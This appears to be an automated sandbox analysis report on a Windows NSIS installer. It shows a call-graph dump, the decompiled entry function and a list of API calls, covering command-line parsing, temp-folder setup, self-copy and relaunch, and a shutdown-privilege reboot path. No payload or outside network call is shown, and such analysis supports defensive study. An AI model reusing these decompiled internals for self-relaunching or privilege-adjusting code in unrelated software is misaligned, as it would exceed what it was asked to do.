3268->3265 3268->3267 3269 405b20 2 API calls 3268->3269 3270 403a3a CloseHandle 3268->3270 3269->3268 3270->3268 3271->3196 3272->3199 3274 4067c4 5 API calls 3273->3274 3276 403508 3274->3276 3275 403512 3275->3205 3276->3275 3277 405e0c 3 API calls 3276->3277 3278 40351a 3277->3278 3279 405aeb 2 API calls 3278->3279 3280 403520 3279->3280 3380 40605c 3280->3380 3384 40602d GetFileAttributesW CreateFileW 3283->3384 3285 4030bd 3303 4030cd 3285->3303 3385 40653d lstrcpynW 3285->3385 3287 4030e3 3288 405e58 2 API calls 3287->3288 3289 4030e9 3288->3289 3386 40653d lstrcpynW 3289->3386 3291 4030f4 GetFileSize 3292 4031ee 3291->3292 3310 40310b 3291->3310 3387 403019 3292->3387 3294 4031f7 3296 403227 GlobalAlloc 3294->3296 3294->3303 3422 4034e5 SetFilePointer 3294->3422 3398 4034e5 SetFilePointer 3296->3398 3298 40325a 3300 403019 6 API calls 3298->3300 3300->3303 3301 403210 3304 4034cf ReadFile 3301->3304 3302 403242 3399 4032b4 3302->3399 3303->3212 3306 40321b 3304->3306 3306->3296 3306->3303 3307 403019 6 API calls 3307->3310 3308 40324e 3308->3303 3308->3308 3309 40328b SetFilePointer 3308->3309 3309->3303 3310->3292 3310->3298 3310->3303 3310->3307 3419 4034cf 3310->3419 3312 40690a 5 API calls 3311->3312 3313 403c00 3312->3313 3314 403c06 GetUserDefaultUILanguage 3313->3314 3315 403c18 3313->3315 3424 406484 wsprintfW 3314->3424 3317 40640b 3 API calls 3315->3317 3318 403c48 3317->3318 3320 403c67 lstrcatW 3318->3320 3321 40640b 3 API calls 3318->3321 3319 403c16 3425 403ec2 3319->3425 3320->3319 3321->3320 3324 405f14 18 API calls 3325 403c99 3324->3325 3326 403d2d 3325->3326 3328 40640b 3 API calls 3325->3328 3327 405f14 18 API calls 3326->3327 3329 403d33 3327->3329 3330 403ccb 3328->3330 3331 403d43 LoadImageW 3329->3331 3334 40657a 17 API calls 3329->3334 3330->3326 3338 403cec lstrlenW 3330->3338 3342 405e39 CharNextW 3330->3342 3332 403de9 3331->3332 3333 403d6a RegisterClassW 3331->3333 3337 40140b 2 API calls 3332->3337 3335 403da0 SystemParametersInfoW CreateWindowExW 3333->3335 3336 403df3 3333->3336 3334->3331 3335->3332 3336->3231 3341 403def 3337->3341 3339 403d20 3338->3339 3340 403cfa lstrcmpiW 3338->3340 3345 405e0c 3 API calls 3339->3345 3340->3339 3344 403d0a GetFileAttributesW 3340->3344 3341->3336 3347 403ec2 18 API calls 3341->3347 3343 403ce9 3342->3343 3343->3338 3346 403d16 3344->3346 3348 403d26 3345->3348 3346->3339 3349 405e58 2 API calls 3346->3349 3350 403e00 3347->3350 3433 40653d lstrcpynW 3348->3433 3349->3339 3352 403e0c ShowWindow 3350->3352 3353 403e8f 3350->3353 3355 40689a 3 API calls 3352->3355 3434 405672 OleInitialize 3353->3434 3357 403e24 3355->3357 3356 403e95 3358 403eb1 3356->3358 3359 403e99 3356->3359 3360 403e32 GetClassInfoW 3357->3360 3364 40689a 3 API calls 3357->3364 3363 40140b 2 API calls 3358->3363 3359->3336 3366 40140b 2 API calls 3359->3366 3361 403e46 GetClassInfoW RegisterClassW 3360->3361 3362 403e5c DialogBoxParamW 3360->3362 3361->3362 3365 40140b 2 API calls 3362->3365 3363->3336 3364->3360 3367 403e84 3365->3367 3366->3336 3367->3336 3368->3203 3369->3251 3370->3218 3371->3257 3372->3268 3374 405bb2 3373->3374 3375 405bc6 MessageBoxIndirectW 3374->3375 3376 403a76 ExitProcess 3374->3376 3375->3376 3378 401389 2 API calls 3377->3378 3379 401420 3378->3379 3379->3224 3381 406069 GetTickCount GetTempFileNameW 3380->3381 3382 40352b 3381->3382 3383 40609f 3381->3383 3382->3205 3383->3381 3383->3382 3384->3285 3385->3287 3386->3291 3388 403022 3387->3388 3389 40303a 3387->3389 3390 403032 3388->3390 3391 40302b DestroyWindow 3388->3391 3392 403042 3389->3392 3393 40304a GetTickCount 3389->3393 3390->3294 3391->3390 3394 406946 2 API calls 3392->3394 3395 403058 CreateDialogParamW ShowWindow 3393->3395 3396 40307b 3393->3396 3397 403048 3394->3397 3395->3396 3396->3294 3397->3294 3398->3302 3400 4032cd 3399->3400 3401 4032fb 3400->3401 3423 4034e5 SetFilePointer 3400->3423 3403 4034cf ReadFile 3401->3403 3404 403306 3403->3404 3405 403468 3404->3405 3406 403318 GetTickCount 3404->3406 3413 403452 3404->3413 3407 4034aa 3405->3407 3411 40346c 3405->3411 3406->3413 3417 403367 3406->3417 3408 4034cf ReadFile 3407->3408 3408->3413 3409 4034cf ReadFile 3409->3417 3410 4034cf ReadFile 3410->3411 3411->3410 3412 4060df WriteFile 3411->3412 3411->3413 3412->3411 3413->3308 3414 4033bd GetTickCount 3414->3417 3415 4033e2 MulDiv wsprintfW 3416 40559f 24 API calls 3415->3416 3416->3417 3417->3409 3417->3413 3417->3414 3417->3415 3418 4060df WriteFile 3417->3418 3418->3417 3420 4060b0 ReadFile 3419->3420 3421 4034e2 3420->3421 3421->3310 3422->3301 3423->3401 3424->3319 3426 403ed6 3425->3426 3441 406484 wsprintfW 3426->3441 3428 403f47 3442 403f7b 3428->3442 3430 403c77 3430->3324 3431 403f4c 3431->3430 3432 40657a 17 API calls 3431->3432 3432->3431 3433->3326 3445 4044e5 3434->3445 3436 4056bc 3437 4044e5 SendMessageW 3436->3437 3439 4056ce OleUninitialize 3437->3439 3438 405695 3438->3436 3448 401389 3438->3448 3439->3356 3441->3428 3443 40657a 17 API calls 3442->3443 3444 403f89 SetWindowTextW 3443->3444 3444->3431 3446 4044fd 3445->3446 3447 4044ee SendMessageW 3445->3447 3446->3438 3447->3446 3450 401390 3448->3450 3449 4013fe 3449->3438 3450->3449 3451 4013cb MulDiv SendMessageW 3450->3451 3451->3450 4360 401a30 4361 402da6 17 API calls 4360->4361 4362 401a39 ExpandEnvironmentStringsW 4361->4362 4363 401a4d 4362->4363 4365 401a60 4362->4365 4364 401a52 lstrcmpW 4363->4364 4363->4365 4364->4365 4371 4023b2 4372 4023c0 4371->4372 4373 4023ba 4371->4373 4375 402da6 17 API calls 4372->4375 4376 4023ce 4372->4376 4374 402da6 17 API calls 4373->4374 4374->4372 4375->4376 4377 4023dc 4376->4377 4378 402da6 17 API calls 4376->4378 4379 402da6 17 API calls 4377->4379 4378->4377 4380 4023e5 WritePrivateProfileStringW 4379->4380 4381 402434 4382 402467 4381->4382 4383 40243c 4381->4383 4384 402da6 17 API calls 4382->4384 4385 402de6 17 API calls 4383->4385 4386 40246e 4384->4386 4387 402443 4385->4387 4392 402e64 4386->4392 4389 402da6 17 API calls 4387->4389 4391 40247b 4387->4391 4390 402454 RegDeleteValueW RegCloseKey 4389->4390 4390->4391 4393 402e71 4392->4393 4394 402e78 4392->4394 4393->4391 4394->4393 4396 402ea9 4394->4396 4397 4063aa RegOpenKeyExW 4396->4397 4398 402ed7 4397->4398 4399 402ee7 RegEnumValueW 4398->4399 4406 402f0a 4398->4406 4407 402f81 4398->4407 4401 402f71 RegCloseKey 4399->4401 4399->4406 4400 402f46 RegEnumKeyW 4402 402f4f RegCloseKey 4400->4402 4400->4406 4401->4407 4403 40690a 5 API calls 4402->4403 4405 402f5f 4403->4405 4404 402ea9 6 API calls 4404->4406 4405->4407 4408 402f63 RegDeleteKeyW 4405->4408 4406->4400 4406->4401 4406->4402 4406->4404 4407->4393 4408->4407 4409 401735 4410 402da6 17 API calls 4409->4410 4411 40173c SearchPathW 4410->4411 4412 401757 4411->4412 4413 401d38 4414 402d84 17 API calls 4413->4414 4415 401d3f 4414->4415 4416 402d84 17 API calls 4415->4416 4417 401d4b GetDlgItem 4416->4417 4418 402638 4417->4418 4419 4014b8 4420 4014be 4419->4420 4421 401389 2 API calls 4420->4421 4422 4014c6 4421->4422 4423 40263e 4424 402652 4423->4424 4425 40266d 4423->4425 4426 402d84 17 API calls 4424->4426 4427 402672 4425->4427 4428 40269d 4425->4428 4435 402659 4426->4435 4429 402da6 17 API calls 4427->4429 4430 402da6 17 API calls 4428->4430 4432 402679 4429->4432 4431 4026a4 lstrlenW 4430->4431 4431->4435 4440 40655f WideCharToMultiByte 4432->4440 4434 40268d lstrlenA 4434->4435 4436 4026d1 4435->4436 4437 4026e7 4435->4437 4439 40610e 5 API calls 4435->4439 4436->4437 4438 4060df WriteFile 4436->4438 4438->4437 4439->4436 4440->4434

                            Executed Functions

                            Function 0040352D Relevance: 81.0, APIs: 34, Strings: 12, Instructions: 450stringfilecomCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 0 40352d-40357d SetErrorMode GetVersionExW 1 4035b7-4035be 0->1 2 40357f-4035b3 GetVersionExW 0->2 3 4035c0 1->3 4 4035c8-403608 1->4 2->1 3->4 5 40360a-403612 call 40690a 4->5 6 40361b 4->6 5->6 11 403614 5->11 8 403620-403634 call 40689a lstrlenA 6->8 13 403636-403652 call 40690a * 3 8->13 11->6 20 403663-4036c5 #17 OleInitialize SHGetFileInfoW call 40653d GetCommandLineW call 40653d 13->20 21 403654-40365a 13->21 28 4036c7-4036c9 20->28 29 4036ce-4036e1 call 405e39 CharNextW 20->29 21->20 25 40365c 21->25 25->20 28->29 32 4037d8-4037de 29->32 33 4037e4 32->33 34 4036e6-4036ec 32->34 37 4037f8-403812 GetTempPathW call 4034fc 33->37 35 4036f5-4036fb 34->35 36 4036ee-4036f3 34->36 38 403702-403706 35->38 39 4036fd-403701 35->39 36->35 36->36 47 403814-403832 GetWindowsDirectoryW lstrcatW call 4034fc 37->47 48 40386a-403882 DeleteFileW call 40307d 37->48 41 4037c6-4037d4 call 405e39 38->41 42 40370c-403712 38->42 39->38 41->32 59 4037d6-4037d7 41->59 45 403714-40371b 42->45 46 40372c-403765 42->46 52 403722 45->52 53 40371d-403720 45->53 54 403781-4037bb 46->54 55 403767-40376c 46->55 47->48 62 403834-403864 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 4034fc 47->62 64 403888-40388e 48->64 65 403a59-403a67 ExitProcess OleUninitialize 48->65 52->46 53->46 53->52 57 4037c3-4037c5 54->57 58 4037bd-4037c1 54->58 55->54 61 40376e-403776 55->61 57->41 58->57 63 4037e6-4037f3 call 40653d 58->63 59->32 66 403778-40377b 61->66 67 40377d 61->67 62->48 62->65 63->37 69 403894-4038a7 call 405e39 64->69 70 403935-40393c call 403bec 64->70 72 403a69-403a78 call 405b9d ExitProcess 65->72 73 403a7e-403a84 65->73 66->54 66->67 67->54 88 4038f9-403906 69->88 89 4038a9-4038de 69->89 84 403941-403944 70->84 75 403a86-403a9b GetCurrentProcess OpenProcessToken 73->75 76 403afc-403b04 73->76 81 403acc-403ada call 40690a 75->81 82 403a9d-403ac6 LookupPrivilegeValueW AdjustTokenPrivileges 75->82 85 403b06 76->85 86 403b09-403b0c ExitProcess 76->86 95 403ae8-403af3 ExitWindowsEx 81->95 96 403adc-403ae6 81->96 82->81 84->65 85->86 90 403908-403916 call 405f14 88->90 91 403949-40395d call 405b08 lstrcatW 88->91 93 4038e0-4038e4 89->93 90->65 106 40391c-403932 call 40653d * 2 90->106 104 40396a-403984 lstrcatW lstrcmpiW 91->104 105 40395f-403965 lstrcatW 91->105 98 4038e6-4038eb 93->98 99 4038ed-4038f5 93->99 95->76 102 403af5-403af7 call 40140b 95->102 96->95 96->102 98->99 100 4038f7 98->100 99->93 99->100 100->88 102->76 109 403a57 104->109 110 40398a-40398d 104->110 105->104 106->70 109->65 112 403996 call 405aeb 110->112 113 40398f-403994 call 405a6e 110->113 119 40399b-4039ab SetCurrentDirectoryW 112->119 113->119 121 4039b8-4039e4 call 40653d 119->121 122 4039ad-4039b3 call 40653d 119->122 126 4039e9-403a04 call 40657a DeleteFileW 121->126 122->121 129 403a44-403a4e 126->129 130 403a06-403a16 CopyFileW 126->130 129->126 132 403a50-403a52 call 4062fd 129->132 130->129 131 403a18-403a38 call 4062fd call 40657a call 405b20 130->131 131->129 140 403a3a-403a41 CloseHandle 131->140 132->109 140->129
                            C-Code - Quality: 78%
                            			_entry_() {
				WCHAR* _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				int _v24;
				int _v28;
				struct _TOKEN_PRIVILEGES _v40;
				signed char _v42;
				int _v44;
				signed int _v48;
				intOrPtr _v278;
				signed short _v310;
				struct _OSVERSIONINFOW _v324;
				struct _SHFILEINFOW _v1016;
				intOrPtr* _t88;
				intOrPtr* _t94;
				void _t97;
				void* _t116;
				WCHAR* _t118;
				signed int _t119;
				intOrPtr* _t123;
				void* _t137;
				void* _t143;
				void* _t148;
				void* _t152;
				void* _t157;
				signed int _t167;
				void* _t170;
				void* _t175;
				intOrPtr _t177;
				intOrPtr _t178;
				intOrPtr* _t179;
				int _t188;
				void* _t189;
				void* _t198;
				signed int _t204;
				signed int _t209;
				signed int _t214;
				int* _t218;
				signed int _t226;
				signed int _t229;
				CHAR* _t231;
				signed int _t233;
				WCHAR* _t234;

				0x440000 = 0x20;
				_t188 = 0;
				_v24 = 0;
				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
				_v20 = 0;
				SetErrorMode(0x8001); // executed
				_v324.szCSDVersion = 0;
				_v48 = 0;
				_v44 = 0;
				_v324.dwOSVersionInfoSize = 0x11c;
				if(GetVersionExW( &_v324) == 0) {
					_v324.dwOSVersionInfoSize = 0x114;
					GetVersionExW( &_v324);
					asm("sbb eax, eax");
					_v42 = 4;
					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
				}
				if(_v324.dwMajorVersion < 0xa) {
					_v310 = _v310 & 0x00000000;
				}
				 *0x434fb8 = _v324.dwBuildNumber;
				 *0x434fbc = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
				if( *0x434fbe != 0x600) {
					_t179 = E0040690A(_t188);
					if(_t179 != _t188) {
						 *_t179(0xc00);
					}
				}
				_t231 = "UXTHEME";
				do {
					E0040689A(_t231); // executed
					_t231 =  &(_t231[lstrlenA(_t231) + 1]);
				} while ( *_t231 != 0);
				E0040690A(0xb);
				 *0x434f04 = E0040690A(9);
				_t88 = E0040690A(7);
				if(_t88 != _t188) {
					_t88 =  *_t88(0x1e);
					if(_t88 != 0) {
						 *0x434fbc =  *0x434fbc | 0x00000080;
					}
				}
				__imp__#17();
				__imp__OleInitialize(_t188); // executed
				 *0x434fc0 = _t88;
				SHGetFileInfoW(0x42b228, _t188,  &_v1016, 0x2b4, _t188); // executed
				E0040653D(0x433f00, L"NSIS Error");
				E0040653D(0x440000, GetCommandLineW());
				_t94 = 0x440000;
				_t233 = 0x22;
				 *0x434f00 = 0x400000;
				if( *0x440000 == _t233) {
					_t94 = 0x440002;
				}
				_t198 = CharNextW(E00405E39(_t94, 0x440000));
				_v16 = _t198;
				while(1) {
					_t97 =  *_t198;
					_t251 = _t97 - _t188;
					if(_t97 == _t188) {
						break;
					}
					_t209 = 0x20;
					__eflags = _t97 - _t209;
					if(_t97 != _t209) {
						L17:
						__eflags =  *_t198 - _t233;
						_v12 = _t209;
						if( *_t198 == _t233) {
							_v12 = _t233;
							_t198 = _t198 + 2;
							__eflags = _t198;
						}
						__eflags =  *_t198 - 0x2f;
						if( *_t198 != 0x2f) {
							L32:
							_t198 = E00405E39(_t198, _v12);
							__eflags =  *_t198 - _t233;
							if(__eflags == 0) {
								_t198 = _t198 + 2;
								__eflags = _t198;
							}
							continue;
						} else {
							_t198 = _t198 + 2;
							__eflags =  *_t198 - 0x53;
							if( *_t198 != 0x53) {
								L24:
								asm("cdq");
								asm("cdq");
								_t214 = L"NCRC" & 0x0000ffff;
								asm("cdq");
								_t226 = ( *0x40a2c2 & 0x0000ffff) << 0x00000010 |  *0x40a2c0 & 0x0000ffff | _t214;
								__eflags =  *_t198 - (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t214);
								if( *_t198 != (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t214)) {
									L29:
									asm("cdq");
									asm("cdq");
									_t209 = L" /D=" & 0x0000ffff;
									asm("cdq");
									_t229 = ( *0x40a2b6 & 0x0000ffff) << 0x00000010 |  *0x40a2b4 & 0x0000ffff | _t209;
									__eflags =  *(_t198 - 4) - (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t209);
									if( *(_t198 - 4) != (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t209)) {
										L31:
										_t233 = 0x22;
										goto L32;
									}
									__eflags =  *_t198 - _t229;
									if( *_t198 == _t229) {
										 *(_t198 - 4) = _t188;
										__eflags = _t198;
										E0040653D(0x440800, _t198);
										L37:
										_t234 = L"C:\\Users\\jones\\AppData\\Local\\Temp\\";
										GetTempPathW(0x400, _t234);
										_t116 = E004034FC(_t198, _t251);
										_t252 = _t116;
										if(_t116 != 0) {
											L40:
											DeleteFileW(L"1033"); // executed
											_t118 = E0040307D(_t254, _v20); // executed
											_v8 = _t118;
											if(_t118 != _t188) {
												L68:
												ExitProcess(); // executed
												__imp__OleUninitialize(); // executed
												if(_v8 == _t188) {
													if( *0x434f94 == _t188) {
														L77:
														_t119 =  *0x434fac;
														if(_t119 != 0xffffffff) {
															_v24 = _t119;
														}
														ExitProcess(_v24);
													}
													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
														LookupPrivilegeValueW(_t188, L"SeShutdownPrivilege",  &(_v40.Privileges));
														_v40.PrivilegeCount = 1;
														_v28 = 2;
														AdjustTokenPrivileges(_v16, _t188,  &_v40, _t188, _t188, _t188);
													}
													_t123 = E0040690A(4);
													if(_t123 == _t188) {
														L75:
														if(ExitWindowsEx(2, 0x80040002) != 0) {
															goto L77;
														}
														goto L76;
													} else {
														_push(0x80040002);
														_push(0x25);
														_push(_t188);
														_push(_t188);
														_push(_t188);
														if( *_t123() == 0) {
															L76:
															E0040140B(9);
															goto L77;
														}
														goto L75;
													}
												}
												E00405B9D(_v8, 0x200010);
												ExitProcess(2);
											}
											if( *0x434f1c == _t188) {
												L51:
												 *0x434fac =  *0x434fac | 0xffffffff;
												_v24 = E00403BEC(_t264);
												goto L68;
											}
											_t218 = E00405E39(0x440000, _t188);
											if(_t218 < 0x440000) {
												L48:
												_t263 = _t218 - 0x440000;
												_v8 = L"Error launching installer";
												if(_t218 < 0x440000) {
													_t189 = E00405B08(__eflags);
													lstrcatW(_t234, L"~nsu");
													__eflags = _t189;
													if(_t189 != 0) {
														lstrcatW(_t234, "A");
													}
													lstrcatW(_t234, L".tmp");
													_t137 = lstrcmpiW(_t234, 0x441800);
													__eflags = _t137;
													if(_t137 == 0) {
														L67:
														_t188 = 0;
														__eflags = 0;
														goto L68;
													} else {
														__eflags = _t189;
														_push(_t234);
														if(_t189 == 0) {
															E00405AEB();
														} else {
															E00405A6E();
														}
														SetCurrentDirectoryW(_t234);
														__eflags =  *0x440800;
														if( *0x440800 == 0) {
															E0040653D(0x440800, 0x441800);
														}
														E0040653D(0x436000, _v16);
														_t201 = "A" & 0x0000ffff;
														_t143 = ( *0x40a25a & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
														__eflags = _t143;
														_v12 = 0x1a;
														 *0x436800 = _t143;
														do {
															E0040657A(0, 0x42aa28, _t234, 0x42aa28,  *((intOrPtr*)( *0x434f10 + 0x120)));
															DeleteFileW(0x42aa28);
															__eflags = _v8;
															if(_v8 != 0) {
																_t148 = CopyFileW(0x443800, 0x42aa28, 1);
																__eflags = _t148;
																if(_t148 != 0) {
																	E004062FD(_t201, 0x42aa28, 0);
																	E0040657A(0, 0x42aa28, _t234, 0x42aa28,  *((intOrPtr*)( *0x434f10 + 0x124)));
																	_t152 = E00405B20(0x42aa28);
																	__eflags = _t152;
																	if(_t152 != 0) {
																		CloseHandle(_t152);
																		_v8 = 0;
																	}
																}
															}
															 *0x436800 =  *0x436800 + 1;
															_t61 =  &_v12;
															 *_t61 = _v12 - 1;
															__eflags =  *_t61;
														} while ( *_t61 != 0);
														E004062FD(_t201, _t234, 0);
														goto L67;
													}
												}
												 *_t218 = _t188;
												_t221 =  &(_t218[2]);
												_t157 = E00405F14(_t263,  &(_t218[2]));
												_t264 = _t157;
												if(_t157 == 0) {
													goto L68;
												}
												E0040653D(0x440800, _t221);
												E0040653D(0x441000, _t221);
												_v8 = _t188;
												goto L51;
											}
											asm("cdq");
											asm("cdq");
											asm("cdq");
											_t204 = ( *0x40a27e & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
											_t167 = ( *0x40a282 & 0x0000ffff) << 0x00000010 |  *0x40a280 & 0x0000ffff | (_t209 << 0x00000020 |  *0x40a282 & 0x0000ffff) << 0x10;
											while( *_t218 != _t204 || _t218[1] != _t167) {
												_t218 = _t218;
												if(_t218 >= 0x440000) {
													continue;
												}
												break;
											}
											_t188 = 0;
											goto L48;
										}
										GetWindowsDirectoryW(_t234, 0x3fb);
										lstrcatW(_t234, L"\\Temp");
										_t170 = E004034FC(_t198, _t252);
										_t253 = _t170;
										if(_t170 != 0) {
											goto L40;
										}
										GetTempPathW(0x3fc, _t234);
										lstrcatW(_t234, L"Low");
										SetEnvironmentVariableW(L"TEMP", _t234);
										SetEnvironmentVariableW(L"TMP", _t234);
										_t175 = E004034FC(_t198, _t253);
										_t254 = _t175;
										if(_t175 == 0) {
											goto L68;
										}
										goto L40;
									}
									goto L31;
								}
								__eflags =  *((intOrPtr*)(_t198 + 4)) - _t226;
								if( *((intOrPtr*)(_t198 + 4)) != _t226) {
									goto L29;
								}
								_t177 =  *((intOrPtr*)(_t198 + 8));
								__eflags = _t177 - 0x20;
								if(_t177 == 0x20) {
									L28:
									_t36 =  &_v20;
									 *_t36 = _v20 | 0x00000004;
									__eflags =  *_t36;
									goto L29;
								}
								__eflags = _t177 - _t188;
								if(_t177 != _t188) {
									goto L29;
								}
								goto L28;
							}
							_t178 =  *((intOrPtr*)(_t198 + 2));
							__eflags = _t178 - _t209;
							if(_t178 == _t209) {
								L23:
								 *0x434fa0 = 1;
								goto L24;
							}
							__eflags = _t178 - _t188;
							if(_t178 != _t188) {
								goto L24;
							}
							goto L23;
						}
					} else {
						goto L16;
					}
					do {
						L16:
						_t198 = _t198 + 2;
						__eflags =  *_t198 - _t209;
					} while ( *_t198 == _t209);
					goto L17;
				}
				goto L37;
			}















































                            0x0040353b
                            0x0040353c
                            0x00403543
                            0x00403546
                            0x0040354d
                            0x00403550
                            0x00403563
                            0x00403569
                            0x0040356c
                            0x0040356f
                            0x0040357d
                            0x00403585
                            0x00403590
                            0x004035a9
                            0x004035ab
                            0x004035b3
                            0x004035b3
                            0x004035be
                            0x004035c0
                            0x004035c0
                            0x004035d5
                            0x004035fa
                            0x00403608
                            0x0040360b
                            0x00403612
                            0x00403619
                            0x00403619
                            0x00403612
                            0x0040361b
                            0x00403620
                            0x00403621
                            0x0040362d
                            0x00403631
                            0x00403638
                            0x00403646
                            0x0040364b
                            0x00403652
                            0x00403656
                            0x0040365a
                            0x0040365c
                            0x0040365c
                            0x0040365a
                            0x00403663
                            0x0040366a
                            0x00403670
                            0x00403688
                            0x00403698
                            0x004036aa
                            0x004036b1
                            0x004036b3
                            0x004036b4
                            0x004036c5
                            0x004036c9
                            0x004036c9
                            0x004036dc
                            0x004036de
                            0x004037d8
                            0x004037d8
                            0x004037db
                            0x004037de
                            0x00000000
                            0x00000000
                            0x004036e8
                            0x004036e9
                            0x004036ec
                            0x004036f5
                            0x004036f5
                            0x004036f8
                            0x004036fb
                            0x004036fe
                            0x00403701
                            0x00403701
                            0x00403701
                            0x00403702
                            0x00403706
                            0x004037c6
                            0x004037cf
                            0x004037d1
                            0x004037d4
                            0x004037d7
                            0x004037d7
                            0x004037d7
                            0x00000000
                            0x0040370c
                            0x0040370d
                            0x0040370e
                            0x00403712
                            0x0040372c
                            0x00403733
                            0x00403746
                            0x00403747
                            0x0040375c
                            0x00403761
                            0x00403763
                            0x00403765
                            0x00403781
                            0x00403788
                            0x0040379b
                            0x0040379c
                            0x004037b1
                            0x004037b7
                            0x004037b9
                            0x004037bb
                            0x004037c3
                            0x004037c5
                            0x00000000
                            0x004037c5
                            0x004037bf
                            0x004037c1
                            0x004037e6
                            0x004037ea
                            0x004037f3
                            0x004037f8
                            0x004037fe
                            0x00403809
                            0x0040380b
                            0x00403810
                            0x00403812
                            0x0040386a
                            0x0040386f
                            0x00403878
                            0x0040387f
                            0x00403882
                            0x00403a59
                            0x00403a59
                            0x00403a5e
                            0x00403a67
                            0x00403a84
                            0x00403afc
                            0x00403afc
                            0x00403b04
                            0x00403b06
                            0x00403b06
                            0x00403b0c
                            0x00403b0c
                            0x00403a9b
                            0x00403aa7
                            0x00403ab8
                            0x00403abf
                            0x00403ac6
                            0x00403ac6
                            0x00403ace
                            0x00403ada
                            0x00403ae8
                            0x00403af3
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00403adc
                            0x00403adc
                            0x00403add
                            0x00403adf
                            0x00403ae0
                            0x00403ae1
                            0x00403ae6
                            0x00403af5
                            0x00403af7
                            0x00000000
                            0x00403af7
                            0x00000000
                            0x00403ae6
                            0x00403ada
                            0x00403a71
                            0x00403a78
                            0x00403a78
                            0x0040388e
                            0x00403935
                            0x00403935
                            0x00403941
                            0x00000000
                            0x00403941
                            0x0040389f
                            0x004038a7
                            0x004038f9
                            0x004038f9
                            0x004038ff
                            0x00403906
                            0x00403954
                            0x00403956
                            0x0040395b
                            0x0040395d
                            0x00403965
                            0x00403965
                            0x00403970
                            0x0040397c
                            0x00403982
                            0x00403984
                            0x00403a57
                            0x00403a57
                            0x00403a57
                            0x00000000
                            0x0040398a
                            0x0040398a
                            0x0040398c
                            0x0040398d
                            0x00403996
                            0x0040398f
                            0x0040398f
                            0x0040398f
                            0x0040399c
                            0x004039a4
                            0x004039ab
                            0x004039b3
                            0x004039b3
                            0x004039c0
                            0x004039cc
                            0x004039d6
                            0x004039d6
                            0x004039d8
                            0x004039df
                            0x004039e9
                            0x004039f5
                            0x004039fb
                            0x00403a01
                            0x00403a04
                            0x00403a0e
                            0x00403a14
                            0x00403a16
                            0x00403a1a
                            0x00403a2b
                            0x00403a31
                            0x00403a36
                            0x00403a38
                            0x00403a3b
                            0x00403a41
                            0x00403a41
                            0x00403a38
                            0x00403a16
                            0x00403a44
                            0x00403a4b
                            0x00403a4b
                            0x00403a4b
                            0x00403a4b
                            0x00403a52
                            0x00000000
                            0x00403a52
                            0x00403984
                            0x00403908
                            0x0040390b
                            0x0040390f
                            0x00403914
                            0x00403916
                            0x00000000
                            0x00000000
                            0x00403922
                            0x0040392d
                            0x00403932
                            0x00000000
                            0x00403932
                            0x004038b0
                            0x004038c8
                            0x004038d9
                            0x004038da
                            0x004038de
                            0x004038e0
                            0x004038ee
                            0x004038f5
                            0x00000000
                            0x00000000
                            0x00000000
                            0x004038f5
                            0x004038f7
                            0x00000000
                            0x004038f7
                            0x0040381a
                            0x00403826
                            0x0040382b
                            0x00403830
                            0x00403832
                            0x00000000
                            0x00000000
                            0x0040383a
                            0x00403842
                            0x00403853
                            0x0040385b
                            0x0040385d
                            0x00403862
                            0x00403864
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00403864
                            0x00000000
                            0x004037c1
                            0x0040376a
                            0x0040376c
                            0x00000000
                            0x00000000
                            0x0040376e
                            0x00403772
                            0x00403776
                            0x0040377d
                            0x0040377d
                            0x0040377d
                            0x0040377d
                            0x00000000
                            0x0040377d
                            0x00403778
                            0x0040377b
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0040377b
                            0x00403714
                            0x00403718
                            0x0040371b
                            0x00403722
                            0x00403722
                            0x00000000
                            0x00403722
                            0x0040371d
                            0x00403720
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00403720
                            0x00000000
                            0x00000000
                            0x00000000
                            0x004036ee
                            0x004036ee
                            0x004036ef
                            0x004036f0
                            0x004036f0
                            0x00000000
                            0x004036ee
                            0x00000000

                            APIs
                            • SetErrorMode.KERNELBASE(00008001), ref: 00403550
                            • GetVersionExW.KERNEL32(?), ref: 00403579
                            • GetVersionExW.KERNEL32(0000011C), ref: 00403590
                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403627
                            • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403663
                            • OleInitialize.OLE32(00000000), ref: 0040366A
                            • SHGetFileInfoW.SHELL32(0042B228,00000000,?,000002B4,00000000), ref: 00403688
                            • GetCommandLineW.KERNEL32(00433F00,NSIS Error), ref: 0040369D
                            • CharNextW.USER32(00000000,00440000,00000020,00440000,00000000), ref: 004036D6
                            • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 00403809
                            • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040381A
                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403826
                            • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040383A
                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403842
                            • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403853
                            • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040385B
                            • DeleteFileW.KERNELBASE(1033), ref: 0040386F
                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403956
